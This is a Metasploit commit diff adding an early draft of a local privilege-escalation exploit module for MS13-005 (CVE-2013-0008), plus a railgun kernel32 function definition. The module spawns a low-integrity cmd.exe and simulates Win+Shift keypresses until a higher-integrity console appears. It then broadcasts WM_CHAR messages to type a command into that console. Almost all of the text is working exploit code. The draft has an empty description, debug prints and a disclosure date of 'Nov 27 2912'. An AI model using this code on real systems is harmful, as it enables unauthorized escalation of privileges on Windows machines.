Initial working

Meatballs1 · Meatballs1 · commit 0235e6803d57 · 2013-07-25T23:24:11.000+01:00
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb
@@ -11,6 +11,8 @@ class Def_kernel32
 
 	def self.create_dll(dll_path = 'kernel32')
 		dll = DLL.new(dll_path, ApiConstants.manager)
+		
+		dll.add_function( 'GetConsoleWindow', 'LPVOID',[])
 
 		dll.add_function( 'ActivateActCtx', 'BOOL',[
 			["HANDLE","hActCtx","inout"],
diff --git a/modules/exploits/windows/local/ms13_005.rb b/modules/exploits/windows/local/ms13_005.rb
@@ -0,0 +1,105 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::EXE
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'MS13-005 Low Integrity to Medium Integrity Privilege Escalation',
+			'Description'   => %q{
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
+					'Tavis Ormandy', #Discovery
+					'Axel Souchet' #@0vercl0k POC
+				],
+			'Platform'      => [ 'win' ],
+			'SessionTypes'  => [ 'meterpreter' ],
+			'Targets'       => 
+			[
+				[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+				[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+			],
+			'DefaultTarget' => 0,
+			'DisclosureDate'=> "Nov 27 2912"
+			# References CVE-2013-0008
+		))
+	end
+
+	def win_shift(number)
+		vk = 0x30 + number
+		bscan = 0x81 + number	
+		client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
+		client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
+		client.railgun.user32.keybd_event(vk, bscan, 0, 0)
+
+		client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
+		client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
+		client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
+	end
+		
+	def count_cmd_procs
+		count = 0
+		client.sys.process.each_process do |proc|
+			if proc['name'] == 'cmd.exe'
+				count += 1
+			end
+		end
+		puts count
+
+		return count
+	end
+
+	# Run Method for when run command is issued
+	def exploit
+		@payload_name = datastore['PAYLOAD']
+		@payload_arch = framework.payloads.create(@payload_name).arch
+
+		# syinfo is only on meterpreter sessions
+		print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+		hwin = client.railgun.kernel32.GetConsoleWindow()['return']
+		if hwin == nil
+			hwin = client.railgun.user32.GetForegroundWindow()['return']
+		end
+		puts client.railgun.user32.ShowWindow(hwin, 0)
+		puts client.railgun.user32.ShowWindowAsync(hwin, 5)
+		# Spawn low integrity cmd.exe
+		li_cmd_pid = client.sys.process.execute("cmd.exe", nil, {'Hidden' => false }).pid
+		
+		count = count_cmd_procs
+		# Win+Shift+?
+		number = 0
+		begin # Ruby DoWhile!
+			i = (9 - number)
+			win_shift(number)
+			number += 1
+			sleep(1)
+		end while count_cmd_procs == count and number <= 9
+		print_status "Spawned!!!"
+
+		client.sys.process.kill(li_cmd_pid)
+		payload = "calc.exe"
+		hwnd_broadcast = 0xffff
+		wm_char = 0x0102
+		payload.each_char do |c|
+			client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, c.unpack('c').first, 0)
+		end
+
+		client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, 'VK_RETURN', 0)
+
+	end
+end
+
